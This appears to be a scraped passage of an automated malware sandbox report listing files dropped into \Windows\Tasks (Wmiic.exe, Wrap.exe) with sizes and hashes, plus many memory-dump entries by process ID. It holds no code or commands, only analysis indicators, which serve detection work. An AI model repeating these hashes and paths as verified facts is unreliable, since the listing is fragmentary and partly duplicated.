c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wmiic.exe
Filesize
365KB

MD5
a18bfe142f059fdb5c041a310339d4fd

SHA1
8ab2b0ddc897603344de8f1d4cc01af118a0c543

SHA256
644c9745d1d2f679db73fcb717dd37e180e19d5b0fc74575e4cefe4f543f2768

SHA512
c30d46781b17c4bb0610d3af4b5acc223394d02f9fbb1fbb55811ae2efe49fd29a7e9626737c4b24194c73c58fe1b577a858559a7e58d93c3660ac680f19eaf8

Download Submit
\Windows\Tasks\Wrap.exe
Filesize
1.0MB

MD5
1006dab1f856d5dd0d143893af79dd96

SHA1
debf139adfb779e519e1d3cb506794989aade417

SHA256
5992923c30024991ab8af2d514224d1f282ce84b84b499dd490ce93f0b60593e

SHA512
d989dc195c695bdb0e2343a5e677e36a818aa8d7a7228bc5cfc4aeb9bd6e33eb76bcaefc5476bfbc49bb78b27e1e9b221154b57c329ae6bda5fbccb090f5236e

Download Submit
memory/556-145-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/556-149-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/556-191-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/588-125-0x0000000000000000-mapping.dmp

Download
memory/588-210-0x0000000000000000-mapping.dmp

Download
memory/628-63-0x0000000072F70000-0x000000007351B000-memory.dmp

Filesize
5.7MB

Download
memory/628-143-0x0000000000000000-mapping.dmp

Download
memory/628-59-0x0000000000000000-mapping.dmp

Download
memory/628-62-0x0000000072F70000-0x000000007351B000-memory.dmp

Filesize
5.7MB

Download
memory/664-105-0x0000000000000000-mapping.dmp

Download
memory/748-214-0x0000000000000000-mapping.dmp

Download
memory/748-216-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

Filesize
8KB

Download
memory/764-218-0x0000000000000000-mapping.dmp

Download
memory/764-240-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/764-103-0x0000000000000000-mapping.dmp

Download
memory/796-174-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/796-178-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/796-245-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/824-113-0x0000000000000000-mapping.dmp

Download
memory/832-230-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/832-247-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/832-248-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/832-219-0x0000000000000000-mapping.dmp

Download
memory/864-118-0x0000000000000000-mapping.dmp

Download
memory/964-97-0x0000000000000000-mapping.dmp

Download
memory/968-184-0x0000000000000000-mapping.dmp

Download
memory/992-232-0x0000000000000000-mapping.dmp

Download
memory/1000-108-0x0000000000000000-mapping.dmp

Download
memory/1008-72-0x0000000000000000-mapping.dmp

Download
memory/1008-182-0x0000000000000000-mapping.dmp

Download
memory/1044-80-0x0000000000000000-mapping.dmp

Download
memory/1068-197-0x0000000000000000-mapping.dmp

Download
memory/1120-92-0x0000000000000000-mapping.dmp

Download
memory/1124-135-0x0000000000000000-mapping.dmp

Download
memory/1124-68-0x0000000000000000-mapping.dmp

Download
memory/1132-225-0x0000000000000000-mapping.dmp

Download
memory/1132-205-0x0000000000000000-mapping.dmp

Download
memory/1244-181-0x0000000000000000-mapping.dmp

Download
memory/1244-235-0x0000000000000000-mapping.dmp

Download
memory/1264-228-0x0000000000000000-mapping.dmp

Download
memory/1264-141-0x0000000000000000-mapping.dmp

Download
memory/1276-203-0x0000000000000000-mapping.dmp

Download
memory/1284-195-0x0000000000000000-mapping.dmp

Download
memory/1288-137-0x0000000000000000-mapping.dmp

Download
memory/1328-55-0x0000000000000000-mapping.dmp

Download
memory/1328-57-0x00000000739D0000-0x0000000073F7B000-memory.dmp

Filesize
5.7MB

Download
memory/1328-58-0x00000000739D0000-0x0000000073F7B000-memory.dmp

Filesize
5.7MB

Download
memory/1328-106-0x0000000000000000-mapping.dmp

Download
memory/1332-138-0x0000000000000000-mapping.dmp

Download
memory/1352-185-0x0000000072F70000-0x000000007351B000-memory.dmp

Filesize
5.7MB

Download
memory/1352-121-0x0000000000000000-mapping.dmp

Download
memory/1352-130-0x0000000072F70000-0x000000007351B000-memory.dmp

Filesize
5.7MB

Download
memory/1352-177-0x0000000072F70000-0x000000007351B000-memory.dmp

Filesize
5.7MB

Download
memory/1444-227-0x0000000000000000-mapping.dmp

Download
memory/1480-117-0x0000000000000000-mapping.dmp

Download
memory/1548-168-0x0000000000000000-mapping.dmp

Download
memory/1604-180-0x0000000000AE0000-0x0000000001B39000-memory.dmp

Filesize
16.3MB

Download
memory/1604-134-0x0000000000AE0000-0x0000000001B39000-memory.dmp

Filesize
16.3MB

Download
memory/1604-132-0x0000000000AE0000-0x0000000001B39000-memory.dmp

Filesize
16.3MB

Download
memory/1604-128-0x0000000000000000-mapping.dmp

Download
memory/1604-179-0x0000000000AE0000-0x0000000001B39000-memory.dmp

Filesize
16.3MB

Download
memory/1636-83-0x0000000000000000-mapping.dmp

Download
memory/1648-115-0x0000000000000000-mapping.dmp

Download
memory/1672-76-0x0000000000000000-mapping.dmp

Download
memory/1716-54-0x00000000760C1000-0x00000000760C3000-memory.dmp

Filesize
8KB

Download
memory/1732-233-0x0000000000000000-mapping.dmp

Download
memory/1744-208-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/1744-199-0x0000000000000000-mapping.dmp

Download
memory/1744-259-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/1744-251-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/1748-116-0x0000000000000000-mapping.dmp

Download
memory/1776-190-0x0000000000000000-mapping.dmp

Download
memory/1776-111-0x0000000000000000-mapping.dmp

Download
memory/1788-109-0x0000000000000000-mapping.dmp

Download
memory/1812-119-0x0000000000000000-mapping.dmp

Download
memory/1812-90-0x0000000000000000-mapping.dmp

Download
memory/1816-142-0x0000000000000000-mapping.dmp

Download
memory/1832-114-0x0000000000000000-mapping.dmp

Download
memory/1868-223-0x0000000000000000-mapping.dmp

Download
memory/1928-209-0x0000000000000000-mapping.dmp

Download
memory/1952-95-0x0000000000000000-mapping.dmp

Download
memory/1964-234-0x0000000000000000-mapping.dmp

Download
memory/1972-146-0x0000000000000000-mapping.dmp

Download
memory/1976-98-0x0000000000000000-mapping.dmp

Download
memory/1976-112-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/1976-139-0x0000000000000000-mapping.dmp

Download
memory/1976-110-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/1988-96-0x0000000000000000-mapping.dmp

Download
memory/2068-236-0x0000000000000000-mapping.dmp

Download
memory/2080-250-0x0000000000000000-0x0000000001000000-memory.dmp

Filesize
16.0MB

Download
memory/2080-237-0x0000000000000000-mapping.dmp

Download
memory/2080-238-0x00000000003D0000-0x00000000003F0000-memory.dmp

Filesize
128KB

Download
memory/2156-241-0x0000000000000000-mapping.dmp

Download
memory/2172-243-0x0000000000000000-mapping.dmp

Download
memory/2336-255-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/2336-261-0x0000000073960000-0x0000000073F0B000-memory.dmp

Filesize
5.7MB

Download
memory/2392-254-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download
memory/2392-260-0x00000000010C0000-0x0000000002119000-memory.dmp

Filesize
16.3MB

Download